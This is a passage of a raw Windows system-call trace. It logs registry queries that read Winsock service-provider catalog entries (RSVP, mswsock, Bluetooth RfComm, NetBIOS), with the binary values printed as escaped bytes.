12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\377\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\0\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11&\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\354\3\0\0\1\0\0\0\204\370\272\2|\370\272\2\210\371\272\2\4\244`u\\12\0\0\240<_u\260\371\272\2\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0R\0S\0V\0P\0 \0U\0D\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\1\0\0\0\344\373\272\2\1\0\0\0\330\273\356\0\0\0\0\0=\373\220|\200\371\272\2\0\0\0\0\0\371\272\2l\373\220|q\373\220|\0\0\0\0\200\371\272\2=\373\220|\334\370\272\2\0\0\0\0\204\3\0\0\375\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\375\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\376\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\05\0\376\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\377\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\377\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\0\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02557 896 NtClose (220, ... ) == 0x0 02558 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000005"}, ... 220, ) }, ... 220, ) == 0x0 02559 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02560 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02561 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f \2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\355\3\0\0\1\0\0\0\210\1\34\0\0\0\34\0\10\0\0\0\0\0\0\0\214\373\272\2\\15\221|\0\0\34\0\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0R\0S\0V\0P\0 \0T\0C\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\210\1\34\0\0\0\0\0\20\0\0\0P\373\272\2\270Ddu\0\0\0\0(\275\356\0|\373\272\2\364\373\272\2\0\0\34\0\10\0\0\0\0\0\0\0(\374\272\2\\15\221|\0\0\34\0\0\0\0\0\204\3\0\0\2\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\2\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\3\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\06\0\3\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\4\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\4\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\5\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f \2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\355\3\0\0\1\0\0\0\210\1\34\0\0\0\34\0\10\0\0\0\0\0\0\0\214\373\272\2\\15\221|\0\0\34\0\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0R\0S\0V\0P\0 \0T\0C\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\210\1\34\0\0\0\0\0\20\0\0\0P\373\272\2\270Ddu\0\0\0\0(\275\356\0|\373\272\2\364\373\272\2\0\0\34\0\10\0\0\0\0\0\0\0(\374\272\2\\15\221|\0\0\34\0\0\0\0\0\204\3\0\0\2\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\2\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\3\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\06\0\3\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\4\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\4\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\5\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\4\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\5\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f \2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\355\3\0\0\1\0\0\0\210\1\34\0\0\0\34\0\10\0\0\0\0\0\0\0\214\373\272\2\\15\221|\0\0\34\0\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0R\0S\0V\0P\0 \0T\0C\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\210\1\34\0\0\0\0\0\20\0\0\0P\373\272\2\270Ddu\0\0\0\0(\275\356\0|\373\272\2\364\373\272\2\0\0\34\0\10\0\0\0\0\0\0\0(\374\272\2\\15\221|\0\0\34\0\0\0\0\0\204\3\0\0\2\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\2\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\3\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\06\0\3\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\4\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\4\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\5\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02562 896 NtClose (220, ... ) == 0x0 02563 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000006"}, ... 220, ) }, ... 220, ) == 0x0 02564 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02565 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02566 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5&\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0d\200\304\237\230r\344C\267\275\30\37 \211y*\374\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0 \0\0\0\36\0\0\0\36\0\0\0\1\0\0\0\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0R\0f\0C\0o\0m\0m\0 \0[\0B\0l\0u\0e\0t\0o\0o\0t\0h\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\7\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\7\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\10\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\07\0\10\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\11\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\11\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\12\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5&\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0d\200\304\237\230r\344C\267\275\30\37 \211y*\374\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0 \0\0\0\36\0\0\0\36\0\0\0\1\0\0\0\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0R\0f\0C\0o\0m\0m\0 \0[\0B\0l\0u\0e\0t\0o\0o\0t\0h\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\7\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\7\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\10\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\07\0\10\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\11\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\11\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\12\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\11\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\12\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5&\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0d\200\304\237\230r\344C\267\275\30\37 \211y*\374\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0 \0\0\0\36\0\0\0\36\0\0\0\1\0\0\0\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0R\0f\0C\0o\0m\0m\0 \0[\0B\0l\0u\0e\0t\0o\0o\0t\0h\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\7\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\7\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\10\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\07\0\10\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\11\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\11\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\12\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02567 896 NtClose (220, ... ) == 0x0 02568 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000007"}, ... 220, ) }, ... 220, ) == 0x0 02569 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02570 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02571 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\23\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0\14\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\14\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\15\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\08\0\15\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\16\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\16\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\17\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\23\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\